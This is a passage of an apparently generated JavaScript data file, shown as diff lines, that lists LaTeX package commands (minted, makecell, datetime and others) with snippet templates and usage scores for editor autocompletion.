'\\preauthor{}', + snippet: '\\preauthor{$1}', + meta: 'titling-cmd', + score: 0.0023736543205198435, + }, + { + caption: '\\postauthor{}', + snippet: '\\postauthor{$1}', + meta: 'titling-cmd', + score: 0.0023736543205198435, + }, + { + caption: '\\pretitle{}', + snippet: '\\pretitle{$1}', + meta: 'titling-cmd', + score: 0.002507149245154055, + }, + ], + wasysym: [ + { + caption: '\\checked', + snippet: '\\checked', + meta: 'wasysym-cmd', + score: 0.0027792832228568255, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'wasysym-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\diameter', + snippet: '\\diameter', + meta: 'wasysym-cmd', + score: 0.0001645367385856751, + }, + { + caption: '\\CIRCLE', + snippet: '\\CIRCLE', + meta: 'wasysym-cmd', + score: 0.000250667024953401, + }, + ], + eurosym: [ + { + caption: '\\EUR{}', + snippet: '\\EUR{$1}', + meta: 'eurosym-cmd', + score: 3.661595357097087e-5, + }, + ], + caption2: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'caption2-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\DeclareCaptionJustification{}{}', + snippet: '\\DeclareCaptionJustification{$1}{$2}', + meta: 'caption2-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\DeclareCaptionLabelSeparator{}{}', + snippet: '\\DeclareCaptionLabelSeparator{$1}{$2}', + meta: 'caption2-cmd', + score: 0.0003890810058478364, + }, + { + caption: '\\DeclareCaptionFormat{}{}', + snippet: '\\DeclareCaptionFormat{$1}{$2}', + meta: 'caption2-cmd', + score: 0.0004717618449370015, + }, + { + caption: '\\DeclareCaptionFont{}{}', + snippet: '\\DeclareCaptionFont{$1}{$2}', + meta: 'caption2-cmd', + score: 5.0133404990680195e-5, + }, + { + caption: '\\DeclareCaptionSubType[]{}', + snippet: '\\DeclareCaptionSubType[$1]{$2}', + meta: 'caption2-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'caption2-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'caption2-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'caption2-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'caption2-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'caption2-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\DeclareCaptionType{}[][]', + snippet: '\\DeclareCaptionType{$1}[$2][$3]', + meta: 'caption2-cmd', + score: 0.00015256647321237863, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'caption2-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'caption2-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\footnotemark[]', + snippet: '\\footnotemark[$1]', + meta: 'caption2-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\footnotemark', + snippet: '\\footnotemark', + meta: 'caption2-cmd', + score: 0.021473212893597875, + }, + ], + amsbsy: [ + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'amsbsy-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'amsbsy-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'amsbsy-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'amsbsy-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'amsbsy-cmd', + score: 0.0063276692758974925, + }, + ], + CJK: [ + { + caption: '\\selectfont', + snippet: '\\selectfont', + meta: 'CJK-cmd', + score: 0.04598628699063736, + }, + ], + makecell: [ + { + caption: '\\diaghead{}{}{}', + snippet: '\\diaghead{$1}{$2}{$3}', + meta: 'makecell-cmd', + score: 2.0417817976377812e-5, + }, + { + caption: '\\makecell{}', + snippet: '\\makecell{$1}', + meta: 'makecell-cmd', + score: 0.005023670619810683, + }, + { + caption: '\\makecell[]{}', + snippet: '\\makecell[$1]{$2}', + meta: 'makecell-cmd', + score: 0.005023670619810683, + }, + { + caption: '\\height', + snippet: '\\height', + meta: 'makecell-cmd', + score: 0.0045883162478394055, + }, + { + caption: '\\height{}', + snippet: '\\height{$1}', + meta: 'makecell-cmd', + score: 0.0045883162478394055, + }, + { + caption: '\\setcellgapes{}', + snippet: '\\setcellgapes{$1}', + meta: 'makecell-cmd', + score: 0.0004960838428758984, + }, + { + caption: '\\thead{}', + snippet: '\\thead{$1}', + meta: 'makecell-cmd', + score: 0.0023087638254186797, + }, + { + caption: '\\Gape[]', + snippet: '\\Gape[$1]', + meta: 'makecell-cmd', + score: 0.000469300371741866, + }, + { + caption: '\\theadgape{}', + snippet: '\\theadgape{$1}', + meta: 'makecell-cmd', + score: 0.000234650185870933, + }, + { + caption: '\\theadalign', + snippet: '\\theadalign', + meta: 'makecell-cmd', + score: 0.0006746935448099005, + }, + { + caption: '\\theadalign{}', + snippet: '\\theadalign{$1}', + meta: 'makecell-cmd', + score: 0.0006746935448099005, + }, + { + caption: '\\theadset{}', + snippet: '\\theadset{$1}', + meta: 'makecell-cmd', + score: 0.0004400433589389675, + }, + { + caption: '\\Xhline{}', + snippet: '\\Xhline{$1}', + meta: 'makecell-cmd', + score: 0.0024175651338281096, + }, + { + caption: '\\theadfont{}', + snippet: '\\theadfont{$1}', + meta: 'makecell-cmd', + score: 0.0007935193556772338, + }, + { + caption: '\\theadfont', + snippet: '\\theadfont', + meta: 'makecell-cmd', + score: 0.0007935193556772338, + }, + { + caption: '\\cellgape{}', + snippet: '\\cellgape{$1}', + meta: 'makecell-cmd', + score: 0.000234650185870933, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'makecell-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'makecell-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\makegapedcells', + snippet: '\\makegapedcells', + meta: 'makecell-cmd', + score: 0.000431467454221244, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'makecell-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'makecell-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'makecell-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'makecell-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'makecell-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'makecell-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'makecell-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'makecell-cmd', + score: 0.018615449342361392, + }, + ], + xeCJK: [ + { + caption: '\\setCJKmonofont{}', + snippet: '\\setCJKmonofont{$1}', + meta: 'xeCJK-cmd', + score: 0.0057178353252375245, + }, + { + caption: '\\setCJKmainfont{}', + snippet: '\\setCJKmainfont{$1}', + meta: 'xeCJK-cmd', + score: 0.006622926778590894, + }, + { + caption: '\\setCJKmainfont[]{}', + snippet: '\\setCJKmainfont[$1]{$2}', + meta: 'xeCJK-cmd', + score: 0.006622926778590894, + }, + { + caption: '\\setCJKsansfont{}', + snippet: '\\setCJKsansfont{$1}', + meta: 'xeCJK-cmd', + score: 0.0057178353252375245, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xeCJK-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xeCJK-cmd', + score: 0.2864294797053033, + }, + ], + threeparttable: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'threeparttable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'threeparttable-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'threeparttable-cmd', + score: 3.800886892251021, + }, + ], + dirtytalk: [ + { + caption: '\\say{}', + snippet: '\\say{$1}', + meta: 'dirtytalk-cmd', + score: 0.010246289746417045, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'dirtytalk-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'dirtytalk-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'dirtytalk-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'dirtytalk-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'dirtytalk-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'dirtytalk-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'dirtytalk-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'dirtytalk-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'dirtytalk-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'dirtytalk-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'dirtytalk-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'dirtytalk-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'dirtytalk-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'dirtytalk-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'dirtytalk-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'dirtytalk-cmd', + score: 0.021170869458413965, + }, + ], + balance: [ + { + caption: '\\balance', + snippet: '\\balance', + meta: 'balance-cmd', + score: 0.003629066156300264, + }, + { + caption: '\\balance{}', + snippet: '\\balance{$1}', + meta: 'balance-cmd', + score: 0.003629066156300264, + }, + ], + minted: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\usemintedstyle{}', + snippet: '\\usemintedstyle{$1}', + meta: 'minted-cmd', + score: 0.00184279823796158, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\inputminted[]{}{}', + snippet: '\\inputminted[$1]{$2}{$3}', + meta: 'minted-cmd', + score: 0.0016501519191680601, + }, + { + caption: '\\inputminted{}{}', + snippet: '\\inputminted{$1}{$2}', + meta: 'minted-cmd', + score: 0.0016501519191680601, + }, + { + caption: '\\setminted[]{}', + snippet: '\\setminted[$1]{$2}', + meta: 'minted-cmd', + score: 0.0004017914210172805, + }, + { + caption: '\\setminted{}', + snippet: '\\setminted{$1}', + meta: 'minted-cmd', + score: 0.0004017914210172805, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'minted-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'minted-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'minted-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'minted-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'minted-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'minted-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\listof{}{}', + snippet: '\\listof{$1}{$2}', + meta: 'minted-cmd', + score: 0.0009837365348002915, + }, + { + caption: '\\floatplacement{}{}', + snippet: '\\floatplacement{$1}{$2}', + meta: 'minted-cmd', + score: 0.0005815474978918903, + }, + { + caption: '\\restylefloat{}', + snippet: '\\restylefloat{$1}', + meta: 'minted-cmd', + score: 0.0008866338267686714, + }, + { + caption: '\\floatstyle{}', + snippet: '\\floatstyle{$1}', + meta: 'minted-cmd', + score: 0.0015470917047414941, + }, + { + caption: '\\floatname{}{}', + snippet: '\\floatname{$1}{$2}', + meta: 'minted-cmd', + score: 0.0011934321931750752, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'minted-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\newfloat{}{}{}', + snippet: '\\newfloat{$1}{$2}{$3}', + meta: 'minted-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\newfloat', + snippet: '\\newfloat', + meta: 'minted-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\newfloat{}', + snippet: '\\newfloat{$1}', + meta: 'minted-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'minted-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'minted-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'minted-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'minted-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'minted-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'minted-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'minted-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'minted-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'minted-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'minted-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'minted-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'minted-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'minted-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fbox{}', + snippet: '\\fbox{$1}', + meta: 'minted-cmd', + score: 0.020865450075016792, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'minted-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\pagewiselinenumbers', + snippet: '\\pagewiselinenumbers', + meta: 'minted-cmd', + score: 0.00016870831850106035, + }, + { + caption: '\\linenomath', + snippet: '\\linenomath', + meta: 'minted-cmd', + score: 1.4517338420208715e-5, + }, + { + caption: '\\linenumberfont{}', + snippet: '\\linenumberfont{$1}', + meta: 'minted-cmd', + score: 0.0001811784338695797, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\endlinenomath', + snippet: '\\endlinenomath', + meta: 'minted-cmd', + score: 1.4517338420208715e-5, + }, + { + caption: '\\nolinenumbers', + snippet: '\\nolinenumbers', + meta: 'minted-cmd', + score: 0.0009805246614299932, + }, + { + caption: '\\path', + snippet: '\\path', + meta: 'minted-cmd', + score: 0.028200474217322108, + }, + { + caption: '\\path[]', + snippet: '\\path[$1]', + meta: 'minted-cmd', + score: 0.028200474217322108, + }, + { + caption: '\\path{}', + snippet: '\\path{$1}', + meta: 'minted-cmd', + score: 0.028200474217322108, + }, + { + caption: '\\filedate{}', + snippet: '\\filedate{$1}', + meta: 'minted-cmd', + score: 0.000578146635331119, + }, + { + caption: '\\filedate', + snippet: '\\filedate', + meta: 'minted-cmd', + score: 0.000578146635331119, + }, + { + caption: '\\linenumbers', + snippet: '\\linenumbers', + meta: 'minted-cmd', + score: 0.004687680659497865, + }, + { + caption: '\\modulolinenumbers[]', + snippet: '\\modulolinenumbers[$1]', + meta: 'minted-cmd', + score: 0.0027194991933605197, + }, + { + caption: '\\fileversion{}', + snippet: '\\fileversion{$1}', + meta: 'minted-cmd', + score: 0.000578146635331119, + }, + { + caption: '\\fileversion', + snippet: '\\fileversion', + meta: 'minted-cmd', + score: 0.000578146635331119, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\refstepcounter{}', + snippet: '\\refstepcounter{$1}', + meta: 'minted-cmd', + score: 0.002140559856649122, + }, + { + caption: '\\VerbatimEnvironment', + snippet: '\\VerbatimEnvironment', + meta: 'minted-cmd', + score: 4.5350034239275855e-5, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\fvset{}', + snippet: '\\fvset{$1}', + meta: 'minted-cmd', + score: 0.00015476887282479622, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'minted-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'minted-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'minted-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'minted-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'minted-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'minted-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'minted-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'minted-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'minted-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'minted-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'minted-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'minted-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'minted-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'minted-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'minted-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'minted-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'minted-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'minted-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'minted-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'minted-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'minted-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + ], + xifthen: [ + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'xifthen-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'xifthen-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'xifthen-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'xifthen-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'xifthen-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'xifthen-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'xifthen-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'xifthen-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'xifthen-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'xifthen-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'xifthen-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'xifthen-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xifthen-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xifthen-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'xifthen-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'xifthen-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'xifthen-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'xifthen-cmd', + score: 0.028955796305270766, + }, + ], + relsize: [ + { + caption: '\\mathlarger{}', + snippet: '\\mathlarger{$1}', + meta: 'relsize-cmd', + score: 0.0031475241540308316, + }, + { + caption: '\\smaller', + snippet: '\\smaller', + meta: 'relsize-cmd', + score: 0.001271007880944704, + }, + ], + epsf: [ + { + caption: '\\epsfbox{}', + snippet: '\\epsfbox{$1}', + meta: 'epsf-cmd', + score: 0.00013712781345832882, + }, + ], + datetime: [ + { + caption: '\\shortmonthname[]', + snippet: '\\shortmonthname[$1]', + meta: 'datetime-cmd', + score: 0.00018524143860552933, + }, + { + caption: '\\THEYEAR', + snippet: '\\THEYEAR', + meta: 'datetime-cmd', + score: 8.638115929876123e-5, + }, + { + caption: '\\currenttime', + snippet: '\\currenttime', + meta: 'datetime-cmd', + score: 0.0002884868472087627, + }, + { + caption: '\\monthname', + snippet: '\\monthname', + meta: 'datetime-cmd', + score: 8.847106423071211e-5, + }, + { + caption: '\\monthname[]', + snippet: '\\monthname[$1]', + meta: 'datetime-cmd', + score: 8.847106423071211e-5, + }, + { + caption: '\\today', + snippet: '\\today', + meta: 'datetime-cmd', + score: 0.10733849317324783, + }, + { + caption: '\\THEMONTH', + snippet: '\\THEMONTH', + meta: 'datetime-cmd', + score: 8.638115929876123e-5, + }, + { + caption: '\\yyyymmdddate', + snippet: '\\yyyymmdddate', + meta: 'datetime-cmd', + score: 0.0002568405365040184, + }, + { + caption: '\\pdfdate', + snippet: '\\pdfdate', + meta: 'datetime-cmd', + score: 9.673490669434574e-5, + }, + { + caption: '\\dateseparator', + snippet: '\\dateseparator', + meta: 'datetime-cmd', + score: 0.00010966778823652713, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'datetime-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\THEDAY', + snippet: '\\THEDAY', + meta: 'datetime-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\usdate', + snippet: '\\usdate', + meta: 'datetime-cmd', + score: 0.00020980148911330757, + }, + { + caption: '\\newdateformat{}{}', + snippet: '\\newdateformat{$1}{$2}', + meta: 'datetime-cmd', + score: 8.638115929876123e-5, + }, + { + caption: '\\settimeformat{}', + snippet: '\\settimeformat{$1}', + meta: 'datetime-cmd', + score: 0.00010966778823652713, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'datetime-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'datetime-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'datetime-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'datetime-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'datetime-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'datetime-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'datetime-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'datetime-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'datetime-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'datetime-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'datetime-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'datetime-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'datetime-cmd', + score: 7.482069221111606e-5, + }, + { + caption: 